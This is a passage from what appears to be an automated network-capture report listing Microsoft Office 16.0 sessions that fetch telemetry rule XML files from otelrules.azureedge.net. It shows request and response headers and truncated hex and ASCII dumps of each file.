                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:14 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:14 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1399
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                              ETag: "0x8DC582BE8C605FF"
                                              x-ms-request-id: 6651509d-f01e-00aa-4661-268521000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134614Z-17c5cb586f6qk7x5scs1ghy2m400000002hg00000000cs8b
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:14 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              134192.168.2.44988113.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:14 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:14 UTC584INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:14 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1366
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                              ETag: "0x8DC582BDF1E2608"
                                              x-ms-request-id: b9c92f65-401e-0016-1c27-2153e0000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134614Z-16849878b78tg5n42kspfr0x4800000000ng00000000a9z1
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:14 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              135192.168.2.44988413.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:14 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:14 UTC584INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:14 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1403
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                              ETag: "0x8DC582BDC2EEE03"
                                              x-ms-request-id: eb22034c-601e-0070-2f28-26a0c9000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134614Z-17c5cb586f64v7xs992vpxwchg00000000q0000000002aw4
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:14 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              136192.168.2.44988313.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:14 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:14 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:14 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1362
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                              ETag: "0x8DC582BDF497570"
                                              x-ms-request-id: f5f98d55-001e-0049-58e4-215bd5000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134614Z-16849878b787wpl5wqkt5731b400000001b000000000cvn8
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:14 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              137192.168.2.44988513.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:15 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:15 UTC584INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:15 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1366
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                              ETag: "0x8DC582BEA414B16"
                                              x-ms-request-id: 9800c975-801e-008c-0e2c-267130000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134615Z-17c5cb586f6g6g2sbe6edp75y400000002mg00000000620s
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:15 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              138192.168.2.44988813.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:15 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:15 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:15 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1403
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                              ETag: "0x8DC582BEB866CDB"
                                              x-ms-request-id: 9b3a7460-601e-003e-70a8-243248000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134615Z-15b8d89586f5s5nz3ffrgxn5ac000000018g000000005czw
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:15 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              139192.168.2.44988613.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:15 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:15 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:15 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1399
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                              ETag: "0x8DC582BE1CC18CD"
                                              x-ms-request-id: 74c47345-e01e-00aa-3afd-24ceda000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134615Z-15b8d89586f2hk28h0h6zye26c00000002y000000000e564
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:15 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              140192.168.2.44988713.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:15 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:15 UTC584INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:15 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1362
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                              ETag: "0x8DC582BEB256F43"
                                              x-ms-request-id: 989b5e1d-301e-003f-2bee-25266f000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134615Z-16849878b78q4pnrt955f8nkx8000000093g00000000gn2w
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              X-Cache-Info: L1_T2
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:15 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              141192.168.2.44988913.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:15 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:15 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:15 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1366
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                              ETag: "0x8DC582BE5B7B174"
                                              x-ms-request-id: 4b9b81ad-501e-007b-4028-265ba2000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134615Z-15b8d89586f42m673h1quuee4s00000004qg000000004zks
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:15 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              142192.168.2.44989013.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:16 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:16 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:16 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1399
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                              ETag: "0x8DC582BE976026E"
                                              x-ms-request-id: f9013c52-001e-0079-5ef2-2412e8000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134616Z-15b8d89586ffsjj9qb0gmb1stn00000004wg000000000eps
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:16 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              143192.168.2.44989313.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:16 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:16 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:16 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1388
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                              ETag: "0x8DC582BDBD9126E"
                                              x-ms-request-id: bf00834f-601e-003d-3a28-266f25000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134616Z-17c5cb586f6z6tw6g7cmdv30m800000001t0000000004z35
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:16 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
